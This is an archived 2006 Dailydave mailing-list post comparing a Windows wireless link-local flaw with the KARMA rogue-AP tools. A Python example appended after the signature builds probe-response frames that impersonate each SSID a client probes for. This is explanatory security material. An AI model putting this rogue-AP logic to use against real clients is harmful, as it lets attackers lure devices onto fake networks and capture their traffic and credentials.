Dailydave mailing list archives

Slashback!


From: Dave Aitel <dave.aitel () gmail com>
Date: Sun, 15 Jan 2006 09:49:14 -0500

How does this: http://it.slashdot.org/it/06/01/15/0815207.shtml
An anonymous reader writes *"Washingtonpost.com is reporting from the 2nd
annual Shmoocon hacker conference about the release of a previously
undocumented vulnerability in
Windows<http://blogs.washingtonpost.com/securityfix/2006/01/windows_feature.html>.
The flaw takes advantage of a feature on Windows laptops that have wireless
cards built-in. Security researcher Mark Loveless found that Windows laptops
which cannot find a wireless connection are configured to broadcast the name
of the last SSID they associated with. They assign themselves an ad-hoc
'link local' (think 169.254.x.x.) address, and an attacker can configure his
machine to broadcast an SSID of the same name. Thus, the attacker associates
with that 'network' and communicates directly with the victim's machine. The
funny part from the Post blog entry is that Microsoft helped author the RFC
for link local."*

Differ from this:

http://www.theta44.org/karma/index.html
KARMA Wireless Client Security Assessment Tools

KARMA is a set of tools for assessing the security of wireless clients at
multiple layers. Wireless sniffing tools discover clients and their
preferred/trusted networks by passively listening for 802.11 Probe Request
frames. From there, individual clients can be targeted by creating a Rogue
AP for one of their probed networks (which they may join automatically) or
using a custom driver that responds to probes and association requests for
any SSID. Higher-level fake services can then capture credentials or exploit
client-side vulnerabilities on the host.

KARMA includes patches for the Linux MADWifi driver to allow the creation of
an 802.11 Access Point that responds to any probed SSID. So if a client
looks for 'linksys', it is 'linksys' to them (even while it may be 'tmobile'
to someone else). Operating in this fashion has revealed vulnerabilities in
how Windows XP and MacOS X look for networks, so clients may join even if
their preferred networks list is empty.

Currently, these releases are BYOX (Bring Your Own Exploits), although a
number of client-side exploits have been written, tested and demonstrated
within this framework. Some may be included in a future release. Automated
agent deployment is also planned.



-dave
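The KARMA description above hinges on two frame-level facts: a client that probes for a network by name leaks that name in the SSID element of its Probe Request, and a rogue AP only has to echo that name back in a Probe Response to become "linksys" for that client. The following is an added example, not code from this post, from KARMA, or from the MADWifi patches it describes. It parses constructed (not captured) 802.11 Probe Request frames into a per-client list of probed SSIDs, skips wildcard probes (empty SSID, which name nothing), and builds the Probe Response a KARMA-style AP would answer with. Frame layouts follow the 802.11 management-frame format (24-byte header, then tagged elements); the MAC addresses, SSIDs and channel are made up, and no FCS trailer is included.

```python
"""Inventory probed SSIDs from 802.11 Probe Requests and craft the matching
Probe Response a KARMA-style rogue AP would send. Added example; every frame
here is constructed with build_probe_request(), not captured off the air."""
import struct
from collections import defaultdict

MGMT_PROBE_REQ = 0x40    # frame control byte 0: type 0 (mgmt), subtype 4
MGMT_PROBE_RESP = 0x50   # type 0 (mgmt), subtype 5
BROADCAST = b"\xff" * 6
IE_SSID, IE_RATES, IE_DS = 0, 1, 3
BASIC_RATES = bytes([IE_RATES, 4, 0x82, 0x84, 0x8B, 0x96])  # 1,2,5.5,11 Mb/s


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def parse_ies(body):
    """Walk the tagged parameters; stop quietly at a truncated element."""
    ies, i = [], 0
    while i + 2 <= len(body):
        tag, ln = body[i], body[i + 1]
        val = body[i + 2:i + 2 + ln]
        if len(val) < ln:          # element claims more bytes than remain
            break
        ies.append((tag, val))
        i += 2 + ln
    return ies


def parse_probe_request(frame):
    """Return (client_mac, ssid) for a Probe Request; ssid is '' for a
    wildcard (broadcast) probe. Return None for anything else or malformed."""
    if len(frame) < 24 or frame[0] != MGMT_PROBE_REQ:
        return None
    client = mac_str(frame[10:16])          # Addr2 = transmitter = client
    for tag, val in parse_ies(frame[24:]):
        if tag == IE_SSID:
            return client, val.decode("utf-8", errors="replace")
    return None                             # SSID element is mandatory


def preferred_networks(frames):
    """Map each client MAC to the set of SSIDs it asked for by name.
    Wildcard probes reveal no network name and are not recorded."""
    seen = defaultdict(set)
    for f in frames:
        parsed = parse_probe_request(f)
        if parsed and parsed[1]:
            seen[parsed[0]].add(parsed[1])
    return dict(seen)


def build_probe_request(client_mac, ssid):
    """Constructed client probe, directed at `ssid` or wildcard if ''."""
    hdr = struct.pack("<BBH6s6s6sH", MGMT_PROBE_REQ, 0, 0, BROADCAST,
                      mac_bytes(client_mac), BROADCAST, 0)
    return hdr + bytes([IE_SSID, len(ssid)]) + ssid.encode() + BASIC_RATES


def build_probe_response(ap_mac, client_mac, ssid, channel=6):
    """What a KARMA-style AP sends back: the very SSID the client probed for,
    claimed as its own, as an open (no privacy bit) ESS. A wildcard probe
    carries no name to echo, so it gets no response here."""
    if not ssid:
        return None
    hdr = struct.pack("<BBH6s6s6sH", MGMT_PROBE_RESP, 0, 0,
                      mac_bytes(client_mac), mac_bytes(ap_mac),
                      mac_bytes(ap_mac), 0)
    # fixed fields: timestamp, beacon interval (TU), capability = ESS only
    fixed = struct.pack("<QHH", 0, 100, 0x0001)
    body = (fixed + bytes([IE_SSID, len(ssid)]) + ssid.encode()
            + BASIC_RATES + bytes([IE_DS, 1, channel]))
    return hdr + body


def respond_to_probes(ap_mac, frames):
    """Rogue-AP loop: one Probe Response per directed probe, tagged with the
    client it goes to and the SSID it impersonates."""
    out = []
    for f in frames:
        parsed = parse_probe_request(f)
        if parsed:
            resp = build_probe_response(ap_mac, parsed[0], parsed[1])
            if resp:
                out.append((parsed[0], parsed[1], resp))
    return out


if __name__ == "__main__":
    # constructed sample: two clients, one of them also sending a wildcard probe
    probes = [
        build_probe_request("00:11:22:33:44:55", "linksys"),
        build_probe_request("00:11:22:33:44:55", ""),
        build_probe_request("66:77:88:99:aa:bb", "tmobile"),
    ]
    print(preferred_networks(probes))
    for client, ssid, _ in respond_to_probes("02:ca:fe:00:00:01", probes):
        print(f"answering {client}: we are now '{ssid}'")
```

The two halves mirror the two KARMA layers: `preferred_networks()` is the passive sniffing stage (it only needs monitor-mode captures), and `respond_to_probes()` is the behaviour the patched driver adds, answering each directed probe with that client's own network name so that the same radio is "linksys" to one client and "tmobile" to another. On real captures, strip the 4-byte FCS and radiotap header before calling `parse_probe_request()`.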
